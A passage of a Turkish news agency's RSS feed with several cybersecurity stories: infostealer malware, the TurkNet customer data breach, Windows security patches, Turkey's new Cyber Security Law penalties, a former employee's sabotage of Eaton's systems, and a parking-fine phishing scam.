<p data-start="1231" data-end="1638"><strong data-start="1231" data-end="1276">Kimlik Bilgileri ve Şifreler de Tehlikede</strong><br data-start="1276" data-end="1279">Kötü amaçlı yazılımlar yalnızca banka kartı bilgilerini değil, aynı zamanda kullanıcıların kimlik bilgilerini ve şifrelerini de çalabiliyor. Çalınan bu veriler, karanlık web üzerinde çerezlerle birlikte yayılmakta. Mağdurlar, telefonlarına, tabletlerine veya bilgisayarlarına bulaşan bu yazılımları fark etmeden büyük bir tehlike ile karşı karşıya kalıyorlar.</p>
<p data-start="1640" data-end="2007"><strong data-start="1640" data-end="1683">Kötü Amaçlı Yazılımlar Nasıl Yayılıyor?</strong><br data-start="1683" data-end="1686">Bilgi hırsızı yazılımlar genellikle meşru bir yazılım gibi gizleniyor. Kaspersky'nin raporunda, oyun hileleri gibi yaygın örnekler verilmekte. Bu yazılımlar, kullanıcılar tarafından indirildikten sonra diğer cihazlara kimlik avı bağlantıları, kötü amaçlı e-posta ekleri ve virüslü web siteleri aracılığıyla yayılabiliyor.</p>
<p data-start="2009" data-end="2486"><strong data-start="2009" data-end="2043">Kendimizi Nasıl Koruyabiliriz?</strong><br data-start="2043" data-end="2046">Kaspersky, bilgi hırsızı yazılımının mağduru olmanız durumunda banka hesaplarınızı ve bildirimlerinizi izlemeyi, banka kartınızı yeniden düzenlemeyi, şifrelerinizi değiştirmeyi ve iki faktörlü kimlik doğrulamasını etkinleştirmenizi öneriyor. Ayrıca, kimlik avı saldırılarına, sahte mesajlara ve telefon aramalarına karşı dikkatli olmalı, cihazlarınızda güvenlik taramaları yapmalı ve tespit edilen kötü amaçlı yazılımları kaldırmalısınız.</p>
<p data-start="2488" data-end="2698"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>TurkNet'e siber saldırı: Statik IP adresleri tehlikede</title>
            <link>https://cumha.com.tr/turknete-siber-saldiri-statik-ip-adresleri-tehlikede</link>
            <guid>https://cumha.com.tr/turknete-siber-saldiri-statik-ip-adresleri-tehlikede</guid>
            <description><![CDATA[ Türkiye&#039;nin önde gelen internet sağlayıcılarından TurkNet, siber saldırıya uğradı. Saldırı sonrası birçok abonenin statik IP adreslerinin açığa çıktığı iddia edilirken, bu durum güvenlik riskleri konusunda endişe yarattı. Statik IP adreslerinin ele geçirilmesi, siber saldırılar ve güvenlik ihlalleri açısından büyük tehdit oluşturuyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67d40e980d6b7.webp" length="111310" type="image/webp"/>
            
            <pubDate>Fri, 14 Mar 2025 14:10:21 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>TurkNet&#039;e yapılan siber saldırı hangi riskleri barındırıyor, statik IP adresi nedir, statik IP ele geçirilirse ne olur, çalınan IP adresi nasıl korunur</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="439" data-end="696">Türkiye'nin önde gelen internet servis sağlayıcılarından TurkNet'in siber saldırıya maruz kaldığı iddia edildi. Yaşanan olay sonrası birçok abonenin statik IP adreslerinin açığa çıktığı öne sürülürken, kullanıcılar veri güvenliği konusunda endişe duyuyor.</p>
<p data-start="698" data-end="720"><strong data-start="698" data-end="718">Statik IP nedir?</strong></p>
<p data-start="722" data-end="989">Statik IP (Internet Protocol) adresi, belirli bir cihaza manuel olarak atanmış ve değişmeyen bir IP adresidir. İnternet bağlantısı veya yerel ağda cihazların tanımlanmasını sağlar. Dinamik IP adreslerinin aksine, statik IP adresleri her yeniden başlatmada değişmez.</p>
<p data-start="991" data-end="1031"><strong data-start="991" data-end="1029">Statik IP ele geçirilirse ne olur?</strong></p>
<p data-start="1033" data-end="1340">Siber saldırganlar tarafından ele geçirilen statik IP adresleri ciddi güvenlik riskleri doğurabilir. Saldırganlar bu adresleri kullanarak ağlara veya sunuculara izinsiz erişim sağlamaya çalışabilir. Ele geçirilen bir IP adresi üzerinden kötü amaçlı yazılımlar yayılabilir ve güvenlik duvarları aşılabilir.</p>
<p data-start="1342" data-end="1687">Ayrıca, çalınan bir IP adresi yasa dışı faaliyetlerde kullanıldığında kara listeye alınabilir. Bu durum, e-posta gönderimlerinde engellemeye veya belirli web sitelerine erişimin kesilmesine neden olabilir. Kullanıcılar, güvenlik risklerini en aza indirmek için IP adreslerini düzenli olarak kontrol etmeli ve güvenlik önlemlerini artırmalıdır.</p>
<p data-start="1689" data-end="1855"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Windows 10 ve 11 için kritik güvenlik güncellemesi yayımlandı!</title>
            <link>https://cumha.com.tr/windows-10-ve-11-icin-kritik-guvenlik-guncellemesi-yayimlandi</link>
            <guid>https://cumha.com.tr/windows-10-ve-11-icin-kritik-guvenlik-guncellemesi-yayimlandi</guid>
            <description><![CDATA[ Microsoft, Windows 10 ve 11 kullanıcılarını etkileyen ciddi güvenlik açıklarını kapatmak için kapsamlı bir güncelleme yayımladı. 57 güvenlik açığını gideren bu güncelleme, özellikle siber saldırganlar tarafından aktif olarak kullanılan zafiyetleri hedef alıyor. Uzaktan erişim ve veri ihlali risklerini azaltmak için güncellemeyi yapmak büyük önem taşıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67d3f3d05422b.webp" length="37012" type="image/webp"/>
            
            <pubDate>Fri, 14 Mar 2025 12:50:13 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Windows 10 ve 11 güvenlik güncellemesi neleri kapsıyor, CVE-2025-24993 açığı nedir, Microsoft’un son güvenlik yamaları hangi tehditleri engelliyor, sistem yöneticileri için güncelleme önerileri neler</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="479" data-end="875"><strong data-start="479" data-end="525">Microsoft’tan önemli güvenlik güncellemesi</strong><br data-start="525" data-end="528">Microsoft, Windows 10 ve 11 işletim sistemlerinde bulunan kritik güvenlik açıklarını kapatmak amacıyla yeni bir güncelleme yayımladı. Şirketin her ay düzenli olarak sunduğu "Patch Tuesday" (Salı Yaması) kapsamında gelen bu güncelleme, aktif olarak siber saldırılarda kullanılan altı güvenlik açığını ve toplamda 57 güvenlik zafiyetini gideriyor.</p>
<p data-start="877" data-end="1387"><strong data-start="877" data-end="917">Sistem güvenliği için kritik yamalar</strong><br data-start="917" data-end="920">Güncellemeyle birlikte, saldırganların bilgisayarlara uzaktan erişim sağlamasına ve zararlı kod çalıştırmasına yol açabilecek açıklar kapatılıyor. En tehlikeli zafiyetlerden biri olan CVE-2025-24993 kodlu güvenlik açığı, saldırganların zararlı bir sanal sabit disk dosyasını açtırarak sistemi ele geçirmesine olanak tanıyor. Microsoft, bu açığın tehlike derecesini 7.8 olarak belirledi ve kullanıcıların güncellemeyi vakit kaybetmeden yapmaları gerektiğini duyurdu.</p>
<p data-start="1389" data-end="1626">Bunun yanı sıra CVE-2025-24991 kodlu güvenlik açığı, saldırganların sistemdeki verilere yetkisiz erişim sağlamasına neden olurken, CVE-2025-24984 kodlu açık ise belirli kayıt dosyalarına istenmeyen verilerin eklenmesine yol açabiliyor.</p>
<p data-start="1628" data-end="2117"><strong data-start="1628" data-end="1666">Siber güvenlik uzmanlarından uyarı</strong><br data-start="1666" data-end="1669">Microsoft, ayrıca aktif olarak saldırılarda kullanılan üç güvenlik açığını daha kapattığını açıkladı. Siber güvenlik uzmanları, aynı anda bu kadar fazla açığın istismar edilmesini olağanüstü bir durum olarak değerlendiriyor. Zero Day Initiative adlı güvenlik araştırma grubu, özellikle CVE-2025-26633 kodlu açığın 600’den fazla kurumu etkilediğini belirterek, sistem yöneticilerinin güncellemeyi en kısa sürede yüklemeleri gerektiğini vurguluyor.</p>
<p data-start="2119" data-end="2348">Microsoft’un yayımladığı bu güncelleme, kullanıcıların sistemlerini siber tehditlere karşı daha güvenli hale getirmeyi amaçlıyor. Kullanıcıların ve sistem yöneticilerinin güncellemeleri zaman kaybetmeden yüklemeleri öneriliyor.</p>
<p data-start="2350" data-end="2568"><strong data-start="2350" data-end="2362"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber Güvenlik Yasası ile Yalan Veri Sızıntısı İddialarına Hapis Cezası</title>
            <link>https://cumha.com.tr/siber-guvenlik-yasasi-ile-yalan-veri-sizintisi-iddialarina-hapis-cezasi</link>
            <guid>https://cumha.com.tr/siber-guvenlik-yasasi-ile-yalan-veri-sizintisi-iddialarina-hapis-cezasi</guid>
            <description><![CDATA[ TBMM’de kabul edilen yeni Siber Güvenlik Kanunu ile veri sızıntıları ve sahte iddialara yönelik ağır cezalar getirildi. Veri sızdıranlara 15 yıla kadar hapis cezası verilirken, gerçeğe aykırı veri sızıntısı iddiaları yayanlar ise 2 ila 5 yıl arasında hapis cezasıyla karşı karşıya kalacak. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67d2c2adb2b32.webp" length="37118" type="image/webp"/>
            
            <pubDate>Thu, 13 Mar 2025 15:20:08 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Yeni Siber Güvenlik Kanunu hangi cezaları öngörüyor, yalan veri sızıntısı iddialarına ne ceza verilecek, veri sızdıranlara kaç yıl hapis cezası uygulanacak, sosyal medya paylaşımlarında nelere dikkat edilmeli</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="417" data-end="420">TBMM'de onaylanarak yasalaşan Siber Güvenlik Kanunu kapsamında, veri sızıntıları ve yanlış bilgi yayma eylemlerine karşı yeni yaptırımlar getirildi. Yasaya göre, veri sızdıranlara 15 yıla kadar hapis cezası verilebilecek. Daha önce sızdırılmış verileri paylaşanlar ise 5 yıla kadar hapis cezası alabilecek.</p>
<p></p>
<p data-start="730" data-end="1043"><strong data-start="730" data-end="778">Yalan veri sızıntısı iddialarına da ceza var</strong><br data-start="778" data-end="781">Kanunda yer alan önemli düzenlemelerden biri de gerçeğe aykırı veri sızıntısı iddialarıyla ilgili oldu. Buna göre, bir kurumun ya da şirketin veri sızıntısına uğradığına dair asılsız iddialar yayanlar 2 ila 5 yıl arasında hapis cezasıyla karşı karşıya kalacak.</p>
<p data-start="1045" data-end="1362">Kanun maddesinde, ‘Siber uzayda veri sızıntısı olmadığını bildiği halde halk arasında endişe, korku ve panik yaratmak ya da kurumları veya şahısları hedef göstermek amacıyla gerçeğe aykırı içerik oluşturanlar veya bu maksatla bu içerikleri yayanlara 2 yıldan 5 yıla kadar hapis cezası verilecek’ ifadeleri yer aldı.</p>
<p data-start="1364" data-end="1834"><strong data-start="1364" data-end="1402">Sosyal medya paylaşımlarına dikkat</strong><br data-start="1402" data-end="1405">Son yıllarda sosyal medyada kamu kurumları, bakanlıklar ve özel şirketlerin veri sızıntısına uğradığına dair birçok iddia ortaya atıldı. Resmi açıklamalarla yalanlanan bu iddiaların bazıları kamuoyunda büyük yankı uyandırdı. Yeni yasa kapsamında, bu tür iddiaları ortaya atan veya paylaşan kişiler de hapis cezası alabilecek. Bu nedenle vatandaşların veri sızıntılarıyla ilgili paylaşımlar yaparken dikkatli olmaları gerekiyor.</p>
<p data-start="1836" data-end="2063"><strong data-start="1836" data-end="1848"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber Güvenlik Kanunu Yasalaştı: Şirketler ve Bireyler İçin Yeni Zorunluluklar</title>
            <link>https://cumha.com.tr/siber-guvenlik-kanunu-yasalasti-sirketler-ve-bireyler-icin-yeni-zorunluluklar</link>
            <guid>https://cumha.com.tr/siber-guvenlik-kanunu-yasalasti-sirketler-ve-bireyler-icin-yeni-zorunluluklar</guid>
            <description><![CDATA[ Türkiye&#039;nin verilerinin korunmasını amaçlayan Siber Güvenlik Kanunu, TBMM&#039;de kabul edildi. Yeni düzenlemeyle şirketler ve bireyler için ciddi yükümlülükler ve yaptırımlar getiriliyor. Kritik altyapıların güvenliği artırılırken, siber saldırılar ve veri sızıntılarıyla ilgili hapis cezaları gündemde. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67d2c263e5bcb.webp" length="100368" type="image/webp"/>
            
            <pubDate>Thu, 13 Mar 2025 14:33:00 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Yeni Siber Güvenlik Kanunu neler içeriyor, şirketler için hangi yükümlülükler getirildi, siber güvenlik ihlallerine hangi cezalar uygulanacak, Siber Güvenlik Başkanlığı hangi yetkilere sahip olacak</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="438" data-end="785"><strong data-start="438" data-end="492">Siber Güvenlik Kurulu ve Başkanlık Yetkilendirildi</strong><br data-start="492" data-end="495">TBMM Genel Kurulu'nda kabul edilen Siber Güvenlik Kanunu ile birlikte, Türkiye’nin dijital güvenliğini sağlamak için yeni düzenlemeler yürürlüğe girdi. Ocak ayında kurulan Siber Güvenlik Başkanlığı’nın yetkileri genişletilirken, Cumhurbaşkanlığına bağlı Siber Güvenlik Kurulu oluşturuldu.</p>
<p data-start="787" data-end="1037">Bu kurul, Türkiye'nin siber tehditlere karşı korunması için strateji belirleme, denetim yapma ve güvenlik politikaları oluşturma yetkisine sahip olacak. Ayrıca kritik altyapıların korunması için yerli ve milli çözümlerin teşvik edilmesi sağlanacak.</p>
<p data-start="1039" data-end="1201"><strong data-start="1039" data-end="1085">Şirketlere ve Bireylere Yeni Yükümlülükler</strong><br data-start="1085" data-end="1088">Yeni yasa, dijital ortamda faaliyet gösteren kamu ve özel sektör kuruluşları ile bireyleri kapsıyor. Buna göre:</p>
<ul data-start="1202" data-end="1535">
<li data-start="1202" data-end="1284">Şirketler, siber güvenlik açıklarını belirlemek ve bildirmekle yükümlü olacak.</li>
<li data-start="1285" data-end="1387">Kamu ve kritik altyapılar için yalnızca yetkilendirilmiş siber güvenlik ürünleri kullanılabilecek.</li>
<li data-start="1388" data-end="1535">Kurumlar ve şirketler, talep edilen siber güvenlik verilerini zamanında ve eksiksiz olarak Siber Güvenlik Başkanlığı'na iletmek zorunda olacak.</li>
</ul>
<p data-start="1537" data-end="1688"><strong data-start="1537" data-end="1576">Ağır Para ve Hapis Cezaları Geliyor</strong><br data-start="1576" data-end="1579">Kanun, siber güvenlik yükümlülüklerini yerine getirmeyen şirketler ve bireyler için ağır cezalar öngörüyor:</p>
<ul data-start="1689" data-end="2067">
<li data-start="1689" data-end="1782">Güvenlik zafiyeti oluşturan şirketlere <strong data-start="1730" data-end="1767">10 milyon TL’ye kadar para cezası</strong> uygulanacak.</li>
<li data-start="1783" data-end="1876">Gerçek olmayan veri sızıntısı haberleri yayanlara <strong data-start="1835" data-end="1863">2 ila 5 yıl hapis cezası</strong> verilecek.</li>
<li data-start="1877" data-end="1964">Daha önce sızdırılmış verileri paylaşanlara <strong data-start="1923" data-end="1951">3 ila 5 yıl hapis cezası</strong> getirildi.</li>
<li data-start="1965" data-end="2067">Türkiye’nin siber altyapısına saldırıda bulunanlar <strong data-start="2018" data-end="2047">8 ila 15 yıl hapis cezası</strong> ile yargılanacak.</li>
</ul>
<p data-start="2069" data-end="2426"><strong data-start="2069" data-end="2119">Siber Olaylara Müdahale Ekibi (SOME) Kurulacak</strong><br data-start="2119" data-end="2122">Siber saldırılara karşı daha etkin mücadele edebilmek için Siber Olaylara Müdahale Ekibi (SOME) kurulacak. Bu ekip, siber tehditleri tespit edecek, müdahalelerde bulunacak ve uluslararası iş birlikleri yürütecek. Ayrıca kamu kurumları ve kritik altyapılar için siber güvenlik tatbikatları düzenlenecek.</p>
<p data-start="2428" data-end="2820"><strong data-start="2428" data-end="2488">Siber Güvenlik Başkanlığı Şirket Verilerine Erişebilecek</strong><br data-start="2488" data-end="2491">Kanuna göre, Siber Güvenlik Başkanlığı; güvenlik risklerini önlemek amacıyla şirketlerin ve bireylerin bilişim sistemlerine erişebilecek, gerekli görülen yazılım ve donanım ürünlerini sistemlere entegre edebilecek. Ayrıca elde edilen veriler en fazla <strong data-start="2742" data-end="2753">iki yıl</strong> süreyle saklanabilecek ve belirlenen süre sonunda imha edilecek.</p>
<p data-start="2822" data-end="2977">Yeni düzenlemeyle Türkiye’deki siber güvenlik standartlarının yükseltilmesi ve dijital tehditlere karşı daha güçlü bir altyapı oluşturulması amaçlanıyor.</p>
<p data-start="2979" data-end="3195"><strong data-start="2979" data-end="2991"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Kişisel veri hırsızlarına 15 yıl, sızdırılmış veriyi paylaşanlara 5 yıl hapis!</title>
            <link>https://cumha.com.tr/kisisel-veri-hirsizlarina-15-yil-sizdirilmis-veriyi-paylasanlara-5-yil-hapis</link>
            <guid>https://cumha.com.tr/kisisel-veri-hirsizlarina-15-yil-sizdirilmis-veriyi-paylasanlara-5-yil-hapis</guid>
            <description><![CDATA[ TBMM&#039;de kabul edilen yeni Siber Güvenlik Kanunu ile kişisel verileri ele geçirenlere 15 yıla kadar hapis cezası verilecek. Daha önce sızmış verileri paylaşanlar ise 5 yıla kadar hapisle yargılanacak. Örgütlü şekilde veri sızdıranlar için cezalar iki katına çıkabilecek. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67d2c243264ce.webp" length="39048" type="image/webp"/>
            
            <pubDate>Thu, 13 Mar 2025 14:32:28 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Yeni Siber Güvenlik Kanunu hangi cezaları içeriyor, veri sızdıranlara kaç yıl hapis cezası verilecek, sızmış veriyi paylaşanlar hangi cezalarla karşılaşacak, örgütlü veri hırsızlığı cezaları nasıl olacak</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="408" data-end="673">Türkiye Büyük Millet Meclisi'nde (TBMM) kabul edilen yeni <strong data-start="466" data-end="491">Siber Güvenlik Kanunu</strong>, kişisel verilerin yasa dışı paylaşımına karşı sert cezalar öngörüyor. Kanuna göre, kişisel verileri ele geçiren, yayan veya satanlar ağır hapis cezalarıyla karşı karşıya kalacak.</p>
<p data-start="675" data-end="725"><strong data-start="675" data-end="723">Veri sızdıranlara 15 yıla kadar hapis cezası</strong></p>
<p data-start="727" data-end="1052">Kanun kapsamında, Türkiye'de siber saldırı düzenleyen ve bu saldırılar sonucunda kişisel verilere erişim sağlayan kişilere <strong data-start="850" data-end="876">8 yıldan 12 yıla kadar</strong> hapis cezası verilecek. Elde edilen kişisel verileri internette paylaşan, üçüncü taraflarla paylaşan veya satışa çıkaranların cezası ise <strong data-start="1014" data-end="1041">10 yıldan 15 yıla kadar</strong> çıkacak.</p>
<p data-start="1054" data-end="1366">Bu suçların <strong data-start="1066" data-end="1147">birden fazla kişi tarafından işlenmesi durumunda cezalar yüzde 50 artırılacak</strong>. Eğer suç <strong data-start="1158" data-end="1187">örgütlü şekilde işlenirse</strong> cezalar <strong data-start="1196" data-end="1216">iki katına kadar</strong> yükseltilecek. Buna göre, organize bir şekilde siber saldırı düzenleyerek veri ele geçirenler <strong data-start="1311" data-end="1346">30 yıla varan hapis cezalarıyla</strong> karşılaşabilecek.</p>
<p data-start="1368" data-end="1422"><strong data-start="1368" data-end="1420">Sızmış veriyi paylaşanlar da hapis cezası alacak</strong></p>
<p data-start="1424" data-end="1724">Yeni düzenleme, daha önce internete sızdırılmış kişisel verileri paylaşanlara da <strong data-start="1505" data-end="1521">hapis cezası</strong> getiriyor. Kişisel veya kritik kamu hizmetleriyle ilgili kurumsal verileri, yetkisiz şekilde paylaşan, ücretli veya ücretsiz erişime açan kişilere <strong data-start="1669" data-end="1707">3 yıldan 5 yıla kadar hapis cezası</strong> verilebilecek.</p>
<p data-start="1726" data-end="2024">Özellikle çeşitli kurumların veritabanlarından ele geçirilen verilerin "panel" adı verilen sistemler üzerinden paylaşılması yaygın bir yöntem olarak biliniyor. Kanun kapsamında, <strong data-start="1904" data-end="2021">bu panelleri işletenler ve buradan elde edilen verileri yayanlar da 5 yıla kadar hapis cezasına çarptırılabilecek</strong>.</p>
<p data-start="2026" data-end="2248"><strong data-start="2026" data-end="2038"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>TurkNet’e Siber Saldırı: Müşteri Bilgileri Sızdırıldı</title>
            <link>https://cumha.com.tr/turknete-siber-saldiri-musteri-bilgileri-sizdirildi</link>
            <guid>https://cumha.com.tr/turknete-siber-saldiri-musteri-bilgileri-sizdirildi</guid>
            <description><![CDATA[ Türkiye’nin önde gelen internet servis sağlayıcılarından TurkNet, 11 Mart 2025’te siber saldırıya uğradığını açıkladı. Yapılan resmi duyuruya göre, ad, soyad, telefon numarası, T.C. kimlik numarası ve statik IP gibi müşteri bilgileri ihlal edildi. Ancak finansal verilerin güvende olduğu belirtildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67d2ba0650ad2.webp" length="41778" type="image/webp"/>
            
            <pubDate>Thu, 13 Mar 2025 13:57:24 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>TurkNet siber saldırısında hangi veriler ele geçirildi, müşteri şifreleri güvende mi, TurkNet saldırıya karşı hangi önlemleri aldı, yasal süreç nasıl ilerleyecek</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="413" data-end="666"><strong data-start="413" data-end="448">Müşteri bilgileri tehlikede mi?</strong><br data-start="448" data-end="451">Türkiye’de faaliyet gösteren büyük internet servis sağlayıcılarından TurkNet, 11 Mart 2025 tarihinde siber saldırıya uğradığını duyurdu. Şirketin açıklamasına göre, saldırı sonucunda müşteri verileri ihlal edildi.</p>
<p data-start="668" data-end="1021"><strong data-start="668" data-end="698">TurkNet’ten resmi açıklama</strong><br data-start="698" data-end="701">TurkNet, yaptığı duyuruda siber saldırının tespit edildiğini ve etkilenen verileri açıkladı. Şirket, ‘Son dönemde dünyada ve Türkiye’de artan siber saldırılar, birçok şirketin teknolojik altyapısını hedef almakta olup, TurkNet’e yönelik benzer bir siber saldırı 11 Mart 2025’te tespit edilmiştir’ ifadelerini kullandı.</p>
<p data-start="1023" data-end="1104">Şirketin açıklamasına göre ihlal edilen bilgiler arasında şu veriler bulunuyor:</p>
<ul data-start="1105" data-end="1270">
<li data-start="1105" data-end="1118">Ad, soyad</li>
<li data-start="1119" data-end="1139">Telefon numarası</li>
<li data-start="1140" data-end="1161">Abonelik numarası</li>
<li data-start="1162" data-end="1186">T.C. kimlik numarası</li>
<li data-start="1187" data-end="1207">Kimlik bilgileri</li>
<li data-start="1208" data-end="1236">Abonelik devre bilgileri</li>
<li data-start="1237" data-end="1246">Adres</li>
<li data-start="1247" data-end="1270">Statik IP bilgileri</li>
</ul>
<p data-start="1272" data-end="1375">Ancak, TurkNet müşterilerinin finansal verileri ile kullanıcı şifrelerinin güvende olduğu vurgulandı.</p>
<p data-start="1377" data-end="1698"><strong data-start="1377" data-end="1403">Yasal süreç başlatıldı</strong><br data-start="1403" data-end="1406">Şirket, saldırının sorumlularının tespiti için çalışmaların sürdüğünü belirterek, Kişisel Verileri Koruma Kurumu (KVKK) ve Bilgi Teknolojileri ve İletişim Kurumu (BTK) gibi ilgili mercilere gerekli bildirimlerin yapılacağını açıkladı. Ayrıca, güvenlik önlemlerinin artırıldığı ifade edildi.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Eski Çalışanı Tarafından Sabotaja Uğrayan Şirketin Sistemleri Çöktü</title>
            <link>https://cumha.com.tr/eski-calisani-tarafindan-sabotaja-ugrayan-sirketin-sistemleri-coektu</link>
            <guid>https://cumha.com.tr/eski-calisani-tarafindan-sabotaja-ugrayan-sirketin-sistemleri-coektu</guid>
            <description><![CDATA[ ABD&#039;de bir yazılım geliştiricisi, eski çalıştığı şirketin sistemlerini sabote etmekten suçlu bulundu. Şirketin ağlarına kötü amaçlı yazılım yükleyen ve &#039;kill switch&#039; kodu ile binlerce çalışanın erişimini engelleyen Davis Lu, 10 yıla kadar hapis cezasıyla karşı karşıya. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67cebf4028e06.webp" length="61388" type="image/webp"/>
            
            <pubDate>Mon, 10 Mar 2025 13:32:12 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Davis Lu neden şirketin sistemlerini sabote etti, kill switch nasıl çalıştı, sabotajın şirkete maliyeti ne kadar oldu, Lu ne kadar hapis cezası alabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="375" data-end="701">ABD'nin Houston kentinde yaşayan 55 yaşındaki yazılım geliştiricisi Davis Lu, eski işvereni Eaton Corporation’a ait bilgisayar sistemlerini sabote etmekten suçlu bulundu. Lu'nun, şirketteki görevlerini kaybettikten sonra özel olarak yazdığı kötü amaçlı yazılımlar ile sistemleri çökerttiği ortaya çıktı.</p>
<p data-start="703" data-end="764"><strong data-start="703" data-end="762">'Kill Switch' ile Binlerce Çalışanı Erişim Dışı Bıraktı</strong></p>
<p data-start="766" data-end="1066">Eaton Corporation, elektrik, hidrolik ve mekanik sistemler üzerine küresel çapta faaliyet gösteren bir güç yönetimi şirketi olarak biliniyor. Davis Lu, 2007 yılından 2019’a kadar şirketin Ohio’daki merkezinde çalıştı. Ancak 2018’de gerçekleşen bir kurumsal yapılanma sonrasında yetkileri azaltıldı.</p>
<p data-start="1068" data-end="1382">Lu, şirketteki bilgisayarlara 'sonsuz döngü' (infinite loop) içeren kötü amaçlı kodlar ekleyerek sistemlerin aşırı yüklenmesine ve çökmelerine neden oldu. Bu kodlar, Java iş parçacıklarını (threads) sürekli olarak yeniden oluşturarak sunucunun kaynaklarını tüketiyor ve çalışanların giriş yapmasını engelliyordu.</p>
<p data-start="1384" data-end="1817">Bunun yanı sıra Lu'nun, iş arkadaşlarının kullanıcı profillerini sildiği ve 'kill switch' adı verilen bir sistem yerleştirdiği belirlendi. 'IsDLEnabledinAD' olarak adlandırılan bu kod, Lu’nun Active Directory hesabı devre dışı bırakıldığında otomatik olarak çalışarak binlerce çalışanın sistem erişimini kesti. Bu mekanizma, Lu'nun 9 Eylül 2019'da işten çıkarılmasıyla tetiklendi ve şirket genelinde büyük bir kesintiye neden oldu.</p>
<p data-start="1819" data-end="1855"><strong data-start="1819" data-end="1853">Hapis Cezası ile Karşı Karşıya</strong></p>
<p data-start="1857" data-end="2151">ABD Adalet Bakanlığı tarafından yürütülen soruşturma kapsamında, Lu'nun internet arama geçmişinde, yetki yükseltme, süreç gizleme ve dosyaları hızla silme yöntemlerine dair araştırmalar yaptığı da tespit edildi. Yetkililer, bu sabotajın şirkete yüz binlerce dolarlık zarar verdiğini belirtti.</p>
<p data-start="2153" data-end="2349">Jüri, Lu'yu 'korunan bilgisayarlara kasıtlı zarar verme' suçlamasıyla mahkum etti. Bu suçun azami cezası 10 yıl hapis olarak belirlenmiş olsa da, henüz kesinleşmiş bir mahkeme kararı bulunmuyor.</p>
<p><a href="https://beykozunsesi.com.tr/eski-calisani-tarafindan-sabotaja-ugrayan-sirketin-sistemleri-coektu" target="_blank" rel="noopener">Eski Çalışanı Tarafından Sabotaja Uğrayan Şirketin Sistemleri Çöktü</a></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ABD’de Sahte Otopark Cezası Mesajları Yayılıyor: Şehirlerden Uyarı</title>
            <link>https://cumha.com.tr/abdde-sahte-otopark-cezasi-mesajlari-yayiliyor-sehirlerden-uyari</link>
            <guid>https://cumha.com.tr/abdde-sahte-otopark-cezasi-mesajlari-yayiliyor-sehirlerden-uyari</guid>
            <description><![CDATA[ ABD&#039;nin birçok şehrinde, sürücülere sahte otopark cezası mesajları gönderilerek dolandırıcılık yapıldığı tespit edildi. Gönderenin resmi otoriteler gibi göründüğü mesajlar, kullanıcılardan sahte sitelere yönlendirilerek kişisel ve finansal bilgilerini çalmayı hedefliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67ceb6d6bc8b1.webp" length="44106" type="image/webp"/>
            
            <pubDate>Mon, 10 Mar 2025 12:54:48 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>ABD’de sahte otopark cezası mesajları nasıl yayılıyor, dolandırıcılar hangi yöntemleri kullanıyor, sahte mesajları nasıl tespit edebilirsiniz, kişisel bilgileriniz nasıl korunabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="376" data-end="790"></p>
<p data-start="376" data-end="790">ABD genelinde birçok şehir, sürücüleri hedef alan yeni bir mobil kimlik avı (phishing) saldırısına karşı uyarıda bulundu. Sahte mesajlar, belediyelerin otopark ihlalleriyle ilgili resmi birimi gibi davranarak, sürücülere ödenmemiş park cezaları olduğu yönünde bildirimler gönderiyor. Mesajda, belirtilen cezanın gününde ödenmemesi halinde günlük 35 dolarlık ek ücret ekleneceği belirtiliyor.</p>
<p data-start="792" data-end="1040">Bu dolandırıcılık yöntemi, New York, Boston, Detroit, Houston, San Diego, San Francisco gibi büyük şehirlerde yoğun olarak görülüyor. Aralık ayından bu yana devam eden saldırılar, sahte bağlantılar aracılığıyla kullanıcıları kandırmayı amaçlıyor.</p>
